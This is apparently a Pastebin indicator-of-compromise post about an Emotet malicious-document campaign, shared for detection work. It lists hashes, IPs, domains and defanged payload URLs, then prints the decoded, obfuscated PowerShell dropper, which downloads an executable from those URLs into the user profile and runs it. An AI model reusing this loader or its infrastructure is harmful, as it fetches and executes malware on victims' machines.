Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #Emotet #Docs #malware #OSINT #IOC
- MD5:
- 62e637e3c69e7f81695507be82bc9357
- ad23f4c0e775c1e50d1886c3d097fb88
- d1def7c0183f8e11a56b018513ae0838
- fc3d54c6f661e56295773e9baeb56c63
- IPs:
- 104.28.4.10
- 162.241.48.174
- 201.131.96.138
- 46.242.253.95
- Domains:
- aysotogaziantep.com
- krzewy-przemysl.pl
- laalpina.cl
- www.noshnow.co.uk
- www.studiomovil.com.mx
- URLs:
- hxxps://www.studiomovil.com.mx/wp-content/erRpJAmInz/
- hxxp://krzewy-przemysl.pl/wp-includes/yf1etsmsp_esqjtujn-589/
- hxxp://laalpina.cl/sisi/cncXoJaqj/
- hxxp://aysotogaziantep.com/wp-content/DSovUnSbnf/
- hxxp://www.noshnow.co.uk/ybzew/wMaxwSMC/
- Decoded Base64 Powershell:
- $Bwsrjto='Zubv5q1';
- $Ajjq36 = '191';
- $Cm6zsc='Oasdq8zq';
- $Ooju7v=$env:userprofile+'\'+$Ajjq36+'.exe';
- $Q4izbvi1='Dpjju28f';
- $Wiiiorcs=.('new'+'-obje'+'ct') NeT.webcLiEnt;
- $Aolild='hxxps://www.studiomovil.com.mx/wp-content/erRpJAmInz/
- hxxp://krzewy-przemysl.pl/wp-includes/yf1etsmsp_esqjtujn-589/
- hxxp://laalpina.cl/sisi/cncXoJaqj/
- hxxp://aysotogaziantep.com/wp-content/DSovUnSbnf/
- hxxp://www.noshnow.co.uk/ybzew/wMaxwSMC/'."sPl`iT"('
- ');
- $Zfw0sv7a='Cizdf5o5';
- foreach($Nwj20ri in $Aolild){try{$Wiiiorcs."do`wnloA`dfi`le"($Nwj20ri, $Ooju7v);
- $Grido7t='N1kctmb6';
- If ((&('Get'+'-Ite'+'m') $Ooju7v)."len`gTh" -ge 23068) {[Diagnostics.Process]::"S`Tart"($Ooju7v);
- $L8zu9is3='T355j92';
- break;
- $P2wsi3b='C5wjwuk9'}}catch{}}$O6ir5r='Y9aiakk'
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
